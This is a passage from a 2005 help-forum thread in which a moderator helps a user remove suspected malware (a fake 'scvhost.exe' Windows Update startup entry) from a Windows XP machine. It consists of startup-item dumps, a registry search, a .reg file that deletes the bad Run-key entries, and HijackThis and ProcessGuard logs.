AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">HPDJ Taskbar Utility</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>HPDJ Taskbar Utility</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">desktop.ini</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">Common Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">desktop</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>desktop.ini</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>Common Startup</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>desktop</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">desktop.ini</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">desktop</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>desktop.ini</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>Startup</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>desktop</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">desktop.ini</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">desktop</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">MYCOMPUTER\Dug And Tania</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>desktop.ini</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>Startup</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>desktop</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>MYCOMPUTER\Dug And Tania</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">desktop.ini</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">desktop</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>desktop.ini</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>Startup</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>desktop</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">msa.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Windows Media Player</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>msa.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Windows Media Player</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">msa.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Windows Media Player</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>msa.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Windows Media Player</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">msnmsng.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">MSN Messanger</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>msnmsng.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>MSN Messanger</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">msnmsng.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">MSN Messanger</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>msnmsng.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>MSN Messanger</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">nwiz.exe /install</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">nwiz</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>nwiz.exe /install</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>nwiz</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">NvCplDaemon</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>NvCplDaemon</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">rundll32.exe nview.dll,nViewLoadHook</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">NVIEW</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">MYCOMPUTER\Dug And Tania</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>rundll32.exe nview.dll,nViewLoadHook</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>NVIEW</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>MYCOMPUTER\Dug And Tania</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">scvhost.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Microsoft Windows Updata</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>scvhost.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Microsoft Windows Updata</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">scvhost.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Microsoft Windows Updata</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>scvhost.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Microsoft Windows Updata</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH></DECLGROUP.WITHPATH></DECLARATION></CIM>
Cheers
  • 0

#143
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you look if any of these files are present?

advpsys.exe
msa.exe
scvhost.exe <= Note the spelling

Also do a Regsrch for that last one scvhost.exe

Regards,
  • 0

#144
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello regsrch found this
REGEDIT4
; RegSrch.vbs © Bill James

; Registry search results for string "scvhost.exe" 22/08/2005 19:24:54

; NOTE: This file will be deleted when you close WordPad.
; You must manually save this file to a new location if you want to refer to it again later.
; (If you save the file with a .reg extension, you can use it to restore any Registry changes you make to these values.)


[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"

no instances of advpsys.exe or msa.exe found
thnaks for your help
  • 0

#145
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
And the file itself? (scvhost.exe)

Was that there as well?
Looking at the way they are starting it probably in Windows\System32 or Windows

Copy the part in bold below into notepad and save it as scvhost.reg
Set Filetype to "all files"

REGEDIT4

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"=-

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"=-


Doubleclick that file and confirm you want to merge it with the registry.

Regards,
  • 0

Advertisements


#146
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
have done the registery merge, could not find the scvhost.exe looked again before i carried out the reg merge
where to from here
Thanks for our help
Cheers
  • 0

#147
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
I want to have a look at a new ProcessGuard log.
If present with cmd.exe in it (not started by you)

And a fresh HijackThis log.

Regards,
  • 0

#148
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
here is the latest hijack log followed by the PG log for last 3 days
Logfile of HijackThis v1.99.1
Scan saved at 7:11:31 p.m., on 24/08/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\savedump.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\WINDOWS\System32\rundll32.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://netaccess.co.nz/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [RegProt] c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] D:\PROGRA~1\YAHOO!\MESSEN~1\ypager.exe -quiet
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: Linked ima&ges - C:\Program Files\IEimage\IEimage.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O15 - Trusted Zone: http://www.giftedonl...edusearch.co.nz
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupd...b?1098860877234
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe

---Process Guard Log Started---
Tue 23 - 17:20:01 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 23 - 17:20:02 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1296]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 23 - 17:20:03 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 23 - 17:20:03 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 23 - 17:20:04 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 23 - 17:20:04 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Tue 23 - 17:20:04 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 23 - 17:20:05 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 23 - 17:20:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2016]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 23 - 17:20:06 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
